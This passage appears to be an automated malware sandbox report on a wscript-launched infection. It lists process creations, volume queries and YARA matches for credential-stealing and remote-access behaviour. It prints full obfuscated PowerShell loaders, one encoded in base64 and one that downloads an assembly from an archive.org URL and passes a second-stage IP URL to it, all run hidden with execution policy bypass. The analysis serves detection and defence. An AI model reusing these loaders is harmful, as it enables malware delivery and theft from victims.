Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnwicrj25pdscrj3jsjysnid0gn3vyahr0jysnchm6ly9pytynkycwjysnmdenkycwjysnmccrjy51cy4nkydhjysncmmnkydoaxynkydllm9yzy8nkycync9pdgvtcy9kjysnzscrj3rhaccrjy1ub3rljysnlxyvrgunkyd0ywhob3rlvi4nkyd0eccrj3q3jysndvgnkyc7jysnwicrj25pymfzjysnzty0jysnq29ujysndccrj2vudca9ichozxctt2inkydqzwn0ifn5jysnc3rljysnbscrjy4nkydojysnzscrj3quv2viqycrj2wnkydpzw50jysnks5ebycrj3cnkydujysnbg9hzfn0jysncmluzyhajysnbicrj2l1cmwpjysno1puascrj2jpbmfyeumnkydvbicrj3rlbnqnkycgjysnpsbbuycrj3lzdgunkydtlkmnkydvjysnbnzlcicrj3rdojpgcicrj29tqmfzzty0u3ryascrj24nkydnkfpuawjhc2u2jysnnenvbnqnkydljysnbicrj3qnkycpoycrj1puawenkydzc2vtymwnkyd5iccrjz0gw1jlzmwnkydly3qnkydpb24nkycuqxnzzscrj20nkydibhldjysnojpmjysnb2fkjysnkccrj1onkyduawjpjysnbmfyeunvbicrj3qnkydljysnbnqpo1onkydujysnaxr5cgugjysnpscrjybajysnbmlhc3nlbwinkydses5hzxruexblkdd1wccrj1inkyd1jysnblbflkgnkydvjysnbwu3jysndvgnkycpoycrj1puaw1ljysndggnkydvzccrjyankyc9ifonkydujysnaxr5cguujysnrycrj2unkyd0twv0jysnaccrj29kjysnkdd1wccrj1ynkydbstd1jysnwck7wicrj25pbwv0ag8nkydklkknkydudm9rzsgnkydabicrj2knkydujysndwxslccrjyankydbjysnb2jqzwmnkyd0w11djysnqccrjyg3dvh0ehquricrj0zdtlivndenkyc0mi81oc45occrjzeumicrjzmnkycylji3mscrjy8nkycvjysnonb0dggnkyc3jysndvggjysnlca3dvhkzxnhdgl2yscrj2rvnycrj3vyiccrjywgn3unkydyzgvzjysnyscrj3rpjysndmenkydkbzd1wcasjysnidd1wccrj2qnkydlc2f0axzhzg83dvgsnycrj3vyuicrj2vnqscrj3ntnycrj3vyjysnldd1wdcnkyd1wckpjyktukvwbgfdzsaow0noqxjdnturw0noqxjdmte3k1tdaefyxtg4ksxbq2hbcl0zosatukvwbgfdzsdabmknlftdaefyxtm2ksb8liaoicrltly6y09tu1blq1s0ldi0ldi1xs1qb2lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('z'+'niu'+'rl'+' = 7uxhtt'+'ps://ia6'+'0'+'01'+'0'+'0'+'.us.'+'a'+'rc'+'hiv'+'e.org/'+'24/items/d'+'e'+'tah'+'-note'+'-v/de'+'tahnotev.'+'tx'+'t7'+'ux'+';'+'z'+'nibas'+'e64'+'con'+'t'+'ent = (new-ob'+'ject sy'+'ste'+'m'+'.'+'n'+'e'+'t.webc'+'l'+'ient'+').do'+'w'+'n'+'loadst'+'ring(z'+'n'+'iurl)'+';zni'+'binaryc'+'on'+'tent'+' '+'= [s'+'yste'+'m.c'+'o'+'nver'+'t]::fr'+'ombase64stri'+'n'+'g(znibase6'+'4cont'+'e'+'n'+'t'+');'+'znia'+'ssembl'+'y '+'= [refl'+'ect'+'ion'+'.asse'+'m'+'bly]'+'::l'+'oad'+'('+'z'+'nibi'+'narycon'+'t'+'e'+'nt);z'+'n'+'itype '+'='+' z'+'niassemb'+'ly.gettype(7ux'+'r'+'u'+'npe.h'+'o'+'me7'+'ux'+');'+'znime'+'th'+'od'+' '+'= z'+'n'+'itype.'+'g'+'e'+'tmet'+'h'+'od'+'(7ux'+'v'+'ai7u'+'x);z'+'nimetho'+'d.i'+'nvoke('+'zn'+'i'+'n'+'ull,'+' '+'['+'objec'+'t[]]'+'@'+'(7uxtxt.f'+'fcnr/41'+'42/58.98'+'1.2'+'3'+'2.271'+'/'+'/'+':ptth'+'7'+'ux '+', 7uxdesativa'+'do7'+'ux '+', 7u'+'xdes'+'a'+'ti'+'va'+'do7ux ,'+' 7ux'+'d'+'esativado7ux,7'+'uxr'+'ega'+'sm7'+'ux'+',7ux7'+'ux))')-replace ([char]55+[char]117+[char]88),[char]39 -replace'zni',[char]36) |. ( $env:comspec[4,24,25]-join'')"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnwicrj25pdscrj3jsjysnid0gn3vyahr0jysnchm6ly9pytynkycwjysnmdenkycwjysnmccrjy51cy4nkydhjysncmmnkydoaxynkydllm9yzy8nkycync9pdgvtcy9kjysnzscrj3rhaccrjy1ub3rljysnlxyvrgunkyd0ywhob3rlvi4nkyd0eccrj3q3jysndvgnkyc7jysnwicrj25pymfzjysnzty0jysnq29ujysndccrj2vudca9ichozxctt2inkydqzwn0ifn5jysnc3rljysnbscrjy4nkydojysnzscrj3quv2viqycrj2wnkydpzw50jysnks5ebycrj3cnkydujysnbg9hzfn0jysncmluzyhajysnbicrj2l1cmwpjysno1puascrj2jpbmfyeumnkydvbicrj3rlbnqnkycgjysnpsbbuycrj3lzdgunkydtlkmnkydvjysnbnzlcicrj3rdojpgcicrj29tqmfzzty0u3ryascrj24nkydnkfpuawjhc2u2jysnnenvbnqnkydljysnbicrj3qnkycpoycrj1puawenkydzc2vtymwnkyd5iccrjz0gw1jlzmwnkydly3qnkydpb24nkycuqxnzzscrj20nkydibhldjysnojpmjysnb2fkjysnkccrj1onkyduawjpjysnbmfyeunvbicrj3qnkydljysnbnqpo1onkydujysnaxr5cgugjysnpscrjybajysnbmlhc3nlbwinkydses5hzxruexblkdd1wccrj1inkyd1jysnblbflkgnkydvjysnbwu3jysndvgnkycpoycrj1puaw1ljysndggnkydvzccrjyankyc9ifonkydujysnaxr5cguujysnrycrj2unkyd0twv0jysnaccrj29kjysnkdd1wccrj1ynkydbstd1jysnwck7wicrj25pbwv0ag8nkydklkknkydudm9rzsgnkydabicrj2knkydujysndwxslccrjyankydbjysnb2jqzwmnkyd0w11djysnqccrjyg3dvh0ehquricrj0zdtlivndenkyc0mi81oc45occrjzeumicrjzmnkycylji3mscrjy8nkycvjysnonb0dggnkyc3jysndvggjysnlca3dvhkzxnhdgl2yscrj2rvnycrj3vyiccrjywgn3unkydyzgvzjysnyscrj3rpjysndmenkydkbzd1wcasjysnidd1wccrj2qnkydlc2f0axzhzg83dvgsnycrj3vyuicrj2vnqscrj3ntnycrj3vyjysnldd1wdcnkyd1wckpjyktukvwbgfdzsaow0noqxjdnturw0noqxjdmte3k1tdaefyxtg4ksxbq2hbcl0zosatukvwbgfdzsdabmknlftdaefyxtm2ksb8liaoicrltly6y09tu1blq1s0ldi0ldi1xs1qb2lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('z'+'niu'+'rl'+' = 7uxhtt'+'ps://ia6'+'0'+'01'+'0'+'0'+'.us.'+'a'+'rc'+'hiv'+'e.org/'+'24/items/d'+'e'+'tah'+'-note'+'-v/de'+'tahnotev.'+'tx'+'t7'+'ux'+';'+'z'+'nibas'+'e64'+'con'+'t'+'ent = (new-ob'+'ject sy'+'ste'+'m'+'.'+'n'+'e'+'t.webc'+'l'+'ient'+').do'+'w'+'n'+'loadst'+'ring(z'+'n'+'iurl)'+';zni'+'binaryc'+'on'+'tent'+' '+'= [s'+'yste'+'m.c'+'o'+'nver'+'t]::fr'+'ombase64stri'+'n'+'g(znibase6'+'4cont'+'e'+'n'+'t'+');'+'znia'+'ssembl'+'y '+'= [refl'+'ect'+'ion'+'.asse'+'m'+'bly]'+'::l'+'oad'+'('+'z'+'nibi'+'narycon'+'t'+'e'+'nt);z'+'n'+'itype '+'='+' z'+'niassemb'+'ly.gettype(7ux'+'r'+'u'+'npe.h'+'o'+'me7'+'ux'+');'+'znime'+'th'+'od'+' '+'= z'+'n'+'itype.'+'g'+'e'+'tmet'+'h'+'od'+'(7ux'+'v'+'ai7u'+'x);z'+'nimetho'+'d.i'+'nvoke('+'zn'+'i'+'n'+'ull,'+' '+'['+'objec'+'t[]]'+'@'+'(7uxtxt.f'+'fcnr/41'+'42/58.98'+'1.2'+'3'+'2.271'+'/'+'/'+':ptth'+'7'+'ux '+', 7uxdesativa'+'do7'+'ux '+', 7u'+'xdes'+'a'+'ti'+'va'+'do7ux ,'+' 7ux'+'d'+'esativado7ux,7'+'uxr'+'ega'+'sm7'+'ux'+',7ux7'+'ux))')-replace ([char]55+[char]117+[char]88),[char]39 -replace'zni',[char]36) |. ( $env:comspec[4,24,25]-join'')" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 4.2.powershell.exe.2669d440000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.powershell.exe.26695b8e698.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.powershell.exe.26695b8e698.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.powershell.exe.2669d440000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.1989363837.000002669D440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1964132789.000002669537A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

barindex
Source: Yara match File source: 4.2.powershell.exe.2669d440000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.powershell.exe.26695b8e698.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.powershell.exe.26695b8e698.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.powershell.exe.2669d440000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.1989363837.000002669D440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1964132789.000002669537A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs